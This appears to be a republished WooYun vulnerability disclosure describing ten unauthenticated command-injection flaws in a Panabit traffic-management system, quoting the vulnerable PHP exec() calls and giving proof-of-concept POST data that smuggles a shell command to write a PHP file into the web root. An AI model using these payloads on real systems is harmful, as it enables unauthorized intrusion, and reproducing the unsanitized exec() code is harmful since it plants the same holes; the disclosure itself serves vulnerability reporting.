Panabit某流量分析管理系统十处命令执行(无需登录) admin 103591文章 87评论 2017年5月4日23:27:39评论982 views字数 246阅读0分49秒阅读模式 摘要2016-03-11: 细节已通知厂商并且等待厂商处理中 2016-03-15: 厂商已经确认,细节仅向厂商公开 2016-03-18: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息) 2016-05-09: 细节向核心白帽子及相关领域专家公开 2016-05-19: 细节向普通白帽子公开 2016-05-29: 细节向实习白帽子公开 2016-06-13: 细节向公众公开 漏洞概要 关注数(24) 关注此漏洞 缺陷编号: WooYun-2016-182986 漏洞标题: Panabit某流量分析管理系统十处命令执行(无需登录) 相关厂商: 北京派网软件有限公司 漏洞作者: komas 提交时间: 2016-03-11 01:50 公开时间: 2016-06-13 17:10 漏洞类型: 命令执行 危害等级: 高 自评Rank: 20 漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理 漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系 Tags标签: 任意文件写入利用 2人收藏 漏洞详情 披露状态: 2016-03-11: 细节已通知厂商并且等待厂商处理中 2016-03-15: 厂商已经确认,细节仅向厂商公开 2016-03-18: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息) 2016-05-09: 细节向核心白帽子及相关领域专家公开 2016-05-19: 细节向普通白帽子公开 2016-05-29: 细节向实习白帽子公开 2016-06-13: 细节向公众公开 简要描述: Panabit某流量分析管理系统十处命令执行(无需登录) 详细说明: 全部打包了只求全rank哇 官网案例:http://**.**.**.**/html/solution/success_case/2014/0903/82.html 可以看到此厂商面对的客户都是一些运营商 高校 企业 小区 网吧用户规模是非常大 第一 二 三 四处:根目录下的fetionlist.php qqlist.php sinawblist.php taobaolist.php code 区域 ..... 关键代码 $devid = $_POST['devid']; $ipaddr = $_POST['ipaddr']; $qqnumber = $_POST['qqnumber']; $strstart = $_POST['starttime']; $strend = $_POST['endtime']; $topn = $_POST['topn']; $account = $_POST['account']; $errfile = _CHECKING_STATUS_F.'/'.$_POST['errname']; $bexport = $_POST['bexport']; $eventtype = $_POST['eventtype']; if ($bexport == 1) $filename = date("YmdHis").".xls"; else if ($bexport == 2) $filename = date("YmdHis").".txt"; else if ($bexport == 3) $filename = date("YmdHis").".csv"; else $filename = "none"; $longstart = strtotime($strstart); $longend = strtotime($strend); if ($ipaddr == "") $ipaddr = "none"; else $ipaddr = ip2long($ipaddr); if ($qqnumber == "") $qqnumber = "none"; if ($account == "") $account = "none"; $tbstart = explode(' ', $strstart); $tbstarts = $tbstart[0]." 00:00:00"; $slong = strtotime($tbstarts) - 24*3600; $elong = $longend; $tablestr = $slong."/".$elong; $k = 0; $result = array(); $res = array(); $link = $filename; $tablefile = php_getfetiontable($strstart, $strend); $cmd = LOGDPATH."/bin/logeye fetionlist $devid $ipaddr $qqnumber $account $longstart $longend $tablefile $bexport $filename $errfile $topn $eventtype"; exec($cmd, $output, $return); 这四处关键部分大概内容都差不多 四处变量$devid $ipaddr $qqnumber $account无防护传给$cmd, $cmd直接进入exec()函数导致命令执行 第五 六处:/Maintain/createappgraph.php /Maintain/createipgraph.php code 区域 $devid = $_POST['devid']; $strstart = $_POST['tmstart']; $strend = $_POST['tmend']; $topapp = $_POST['topapp']; $linkid = $_POST['linkid']; $appname = $_POST['appname']; $conn = mysql_connect(MYSQL_HOST, MYSQL_USER, MYSQL_PASS); mysql_query("set names 'utf8'"); $result = mysql_query("select name from palog.axp where cname = '$appname'"); if (mysql_num_rows($result) != 0) { $row = mysql_fetch_row($result); $appname = $row[0]; } mysql_close(); $longstart = strtotime($strstart); $longend = strtotime($strend); $tbstart = explode(' ', $strstart); $tbstarts = $tbstart[0]." 00:00:00"; $slong = strtotime($tbstarts)-30*60; $elong = $longend; $tables = $slong."/".$elong; function formatdata($values, $u) { if ($values > 1024*1024*1024){ $units = 'G'; $div = 1024*1024*1024; } else if ($values > 1024*1024){ $units = 'M'; $div = 1024*1024; } else if ($values > 1024){ $units = 'K'; $div = 1024; }else { $units = 'B'; $div = 1; } if ($u == 'units') return $units; else return $div; } $labels = array(); $values = array(); $chart = new VerticalBarChart(1100, 300); $dataSet = new XYDataSet(); exec(DOCROOT."//bin//logeye.exe apptop $devid $longstart $longend $tables $topapp appup $linkid", $output, $return); Maintain此为后台目录但是没有验证权限导致未授权访问 这两处关键部分大概内容都差不多 三处变量$devid $linkid $topapp未过滤进入exec()函数导致命令执行 第七 八处/Maintain/exportpdf.php /Maintain/exportpdf_cgi.php code 区域 $devid = $_POST['devid']; $ip = $_POST['ip']; $strstart = $_POST['tmstart']; $strend = $_POST['tmend']; $top = $_POST['top']; $errfile = _CHECKING_STATUS_F.'/'.$_POST['errname']; if ($ip == "") $ip = "**.**.**.**-**.**.**.**"; $longstart = strtotime($strstart); $longend = strtotime($strend); $tbstart = explode(' ', $strstart); $tbstarts = $tbstart[0]." 00:00:00"; $slong = strtotime($tbstarts)-6*30*60; $elong = $longend; $tables = $slong."/".$elong; $pdf=new PDF('P', 'mm', 'A4'); $pdf->Open(); $pdf->SetMargins(5, 5, 5); $pdf->AddPage(); $pdf->SetDisplayMode('real'); $pdf->AddGBFont(); $pdf->SetFont('GB', 'B', 25); $pdf->SetXY(57, 70); $pdf->Cell(40,10, '流控日志管理系统报表'); $pdf->Ln(); $pdf->SetX(80); $pdf->Cell(40,10,'('.date('Y/m/d').')'); $pdf->Ln(); $pdf->Image($doc.'/img/logo.jpg', 75, 90, 50, 15); $pdf->SetFont('GB', '', 14); $pdf->Ln(50); $pdf->SetX(60); $pdf->Cell(40, 10, '创建用户:'); $pdf->Cell(40, 10, $_COOKIE['c_username']); $pdf->Ln(); $pdf->SetX(60); $pdf->Cell(40, 10, '流控设备编号:'); if ($devid == 0) $pdf->Cell(40, 10, "所有设备"); else $pdf->Cell(40,10, $devid); $pdf->Ln(); $pdf->SetX(60); $pdf->Cell(40, 10, '统计时间段:'); $pdf->Cell(40, 10, date('Y/m/d H:i', $longstart).'-'.date('Y/m/d H:i', $longend)); $pdf->Ln(); $pdf->SetX(60); $pdf->Cell(40, 10, '报表生成时间:'); $pdf->Cell(40, 10, date('Y/m/d H:i'), 0,1,'L',false); $dwidth = array(10, 28, 18, 18, 18, 18, 18, 18, 18, 18, 18); $arcolors = array("#068BC5","#4EB133","#E6561C","#E6EB01","#24C8E3","#62E172","#F7EE64","#69F5C3","#ACDBFD","#C6C9CA", "#F68F67","#CDE577","#710000","#5D584B","#4572A7"); $pdf->AddPage(); $tablefile = php_getiptable($strstart, $strend, $devid); exec(LOGDPATH."/bin/logeye iptop $devid $ip $longstart $longend $tablefile $top total $errfile", $output, $return); $xlabels = array(); $yvalues = array(); foreach($output as $key=>$val){ $ds = explode(' ', $val); if ($ds[0] == "**.**.**.**") continue; array_push($xlabels, $ds[0]); array_push($yvalues, (double)$ds[1] / 1000 / 1000); } if (count($yvalues) != 0) { $graph = new Graph(1000,300,'auto'); $graph->SetScale("textlin"); $graph->img->SetMargin(50,50,10,100); $graph->title->SetFont(FF_SIMSUN, FS_NORMAL); $graph->xaxis->SetFont(FF_SIMSUN, FS_NORMAL); $graph->title->Set("(单位:M)"); $graph->ygrid->SetFill(false); $graph->xaxis->SetLabelAngle(50); $graph->xaxis->SetTickLabels($xlabels); $graph->yaxis->HideLine(false); $graph->yaxis->HideTicks(false,false); $bplot = new BarPlot($yvalues); $bplot->SetFillColor($arcolors); $graph->Add($bplot); $graph->Stroke($doc."/download/iptotal.png"); $pdf->SetFont('GB', 'B', 14); $pdf->Cell(40, 10, '用户统计'); $pdf->Ln(); $pdf->Ln(); $pdf->Image($doc.'/download/iptotal.png', $pdf->GetX(), $pdf->GetY(), 200, 80); //unlink($doc.'/download/iptotal.png'); $pdf->Ln(); $pdf->SetY(110); $pdf->SetFillColor(58,110,165); $pdf->SetTextColor(255, 255,255); $pdf->SetFont('GB', 'B', 10); $pdf->Cell(10, 14, "序号", 1, 0, 'C', true); $pdf->Cell(28, 14, "用户", 1, 0, 'C', true); $pdf->Cell(54, 7, "流量(字节)", 1, 2, 'C', true); $pdf->Cell(18, 7, "上行", 1, 0, 'C', true); $pdf->Cell(18, 7, "下行", 1, 0, 'C', true); $pdf->Cell(18, 7, "总", 1, 0, 'C', true); $pdf->SetXY($pdf->GetX(), $pdf->GetY()-7); $pdf->Cell(54, 7, "平均速率(bps)", 1, 2, 'C', true); $pdf->Cell(18, 7, "上行", 1, 0, 'C', true); $pdf->Cell(18, 7, "下行", 1, 0, 'C', true); $pdf->Cell(18, 7, "总", 1, 0, 'C', true); $pdf->SetXY($pdf->GetX(), $pdf->GetY()-7); $pdf->Cell(54, 7, "峰值速率(bps)", 1, 2, 'C', true); $pdf->Cell(18, 7, "上行", 1, 0, 'C', true); $pdf->Cell(18, 7, "下行", 1, 0, 'C', true); $pdf->Cell(18, 7, "总", 1, 0, 'C', true); $pdf->Ln(); $pdf->SetTextColor(0, 0,0); foreach($output as $key=>$val){ $ds = explode(' ', $val); if ($ds[0] == "**.**.**.**") continue; $pdf->Cell($dwidth[0], 7, $key+1, 1, 0, 'C'); $pdf->Cell($dwidth[1], 7, $ds[0], 1, 0, 'C'); $pdf->Cell($dwidth[2], 7, dataformat((double)$ds[2]), 1, 0, 'C'); $pdf->Cell($dwidth[3], 7, dataformat((double)$ds[3]), 1, 0, 'C'); $pdf->Cell($dwidth[4], 7, dataformat((double)$ds[1]), 1, 0, 'C'); $pdf->Cell($dwidth[5], 7, dataformat((double)$ds[2]*8/$ds[8]), 1, 0, 'C'); $pdf->Cell($dwidth[6], 7, dataformat((double)$ds[3]*8/$ds[8]), 1, 0, 'C'); $pdf->Cell($dwidth[7], 7, dataformat((double)$ds[1]*8/$ds[8]), 1, 0, 'C'); $pdf->Cell($dwidth[8], 7, dataformat((double)$ds[6]*8/$ds[9]), 1, 0, 'C'); $pdf->Cell($dwidth[9], 7, dataformat((double)$ds[7]*8/$ds[9]), 1, 0, 'C'); $pdf->Cell($dwidth[10], 7, dataformat(((double)$ds[6]+(double)$ds[7])*8/$ds[9]), 1, 0, 'C'); $pdf->Ln(); } $pdf->AddPage(); unset($output); unset($xlabels); unset($yvalues); } else { outputres("no", "noip"); exit; } $tablefile = php_getapptable($strstart, $strend); exec(LOGDPATH."/bin/logeye apptop $devid $longstart $longend $tablefile $top total 0 $errfile", $output, $return); 这两处关键部分大概内容都差不多 变量$devid $top未过滤进入exec()函数导致命令执行 第九处:/Maintain/ifadmin.php code 区域 <?php $doc = $_SERVER['DOCUMENT_ROOT']; include("$doc/common.php"); $ifadmin = $_POST['ifadmin']; $ipaddr = $_POST['ipaddr']; $netmask = $_POST['netmask']; $gateway = $_POST['gateway']; $confl = array(); $confl = file("/etc/rc.conf"); foreach($confl as $val){ if (strstr($val, "ifconfig") !== false){ $ds = explode('=', $val); $ifconfig = $ds[0]; $ipstr = $ds[1]; $ds1 = explode('_', $ifconfig); $ori_ifadmin = $ds1[1]; $ds2 = explode(' ', $ipstr); $ori_ipaddr = $ds2[1]; $ori_netmask = trim($ds2[3], "/"/n/r"); } if (strstr($val, "defaultrouter") !== false){ $ds = explode('=', $val); $ori_gateway = trim($ds[1], "/"/n/r"); } } if ($ipaddr == $ori_ipaddr && $netmask == $ori_netmask && $gateway == $ori_gateway) outputres("yes", "操作成功"); else{ $confl = array(); $confl = file("/etc/rc.conf"); $fp = fopen("/etc/rc.conf", "w"); foreach($confl as $val){ if (strstr($val, "ifconfig") !== false){ fwrite($fp, "ifconfig_$ifadmin=/"inet $ipaddr netmask $netmask/"/n"); continue; } if (strstr($val, "defaultrouter") !== false){ fwrite($fp, "defaultrouter=/"$gateway/"/n"); continue; } fwrite($fp, $val); } fclose($fp); exec("ifconfig $ifadmin $ipaddr netmask $netmask"); exec("route add default $gateway"); outputres("yes", "操作成功"); } ?> 变量$ifadmin $ipaddr netmask $netmask 未过滤导致命令执行 第十处:/Maintain/zpool_set.php code 区域 if (!file_exists("/usr/logd/bin/install_device")){ outputres("no", "对不起,此功能在最新ISO安装的系统上有效"); exit(0); } if ($type == "add"){ $add = $_POST['add']; exec("df -h | grep mylog", $output, $ret); if ($ret == 1){ outputres("no", "zpool mylog is not exists!"); exit(0); } exec("zpool add -f mylog $add", $output, $ret); if ($ret == 1){ outputres("no", $output[0]); exit(0); } outputres("yes", ""); } if ($type == "replace"){ $repla = $_POST['repla']; $new_repla = $_POST['new_repla']; exec("df -h | grep mylog", $output, $ret); if ($ret == 1){ outputres("no", "zpool mylog is not exists!"); exit(0); } exec("zpool replace -f mylog $repla $new_repla", $output, $ret); if ($ret == 1){ outputres("no", $output[0]); exit(0); } outputres("yes", ""); } 变量$add $repla未过滤导致命令执行 漏洞证明: 这么多处,随便拿两处来说吧 第四处证明拿一处来说 **.**.**.**/qqlist.php postdata: devid=1&ipaddr=**.**.**.**&account=xx;echo 1111>/usr/logd/www/1111.php 执行完会在根目录生成一个1111.php的文件 第二处后台证明:**.**.**.**/Maintain/exportpdf.php postdata:devid=11;echo xxxxxxx>/usr/logd/www/223.php 后台其它文件也是同理会执行成功 修复方案: 交给厂商 版权声明:转载请注明来源 komas@乌云 漏洞回应 厂商回应: 危害等级:高 漏洞Rank:16 确认时间:2016-03-15 17:01 厂商回复: CNVD未直接复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。 最新状态: 暂无 漏洞评价: 对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值 漏洞评价(少于3人评价): 登陆后才能进行评分 100% 0% 0% 0% 0% 评价 2016-03-11 08:57 | 牛肉包子 ( 普通白帽子 | Rank:307 漏洞数:70 | baozisec) 2 $$$ 1# 回复此人 2016-03-11 09:05 | komas ( 普通白帽子 | Rank:107 漏洞数:25 ) 2 @牛肉包子 我竟无言以对,咋可能 2# 回复此人 2016-03-11 09:06 | king7 ( 普通白帽子 | Rank:1902 漏洞数:253 | 早知如此绊人心,何如当初莫相识。) 2 可以 3# 回复此人 2016-03-11 09:09 | komas ( 普通白帽子 | Rank:107 漏洞数:25 ) 2 @king7 求带 4# 回复此人 2016-03-11 10:56 | f4ckbaidu ( 普通白帽子 | Rank:265 漏洞数:33 | 开发真是日了狗了) 2 $$ 5# 回复此人 2016-03-18 12:07 | 北京派网软件有限公司(乌云厂商) 1 已修正 6# 回复此人 点赞 https://cn-sec.com/archives/43915.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论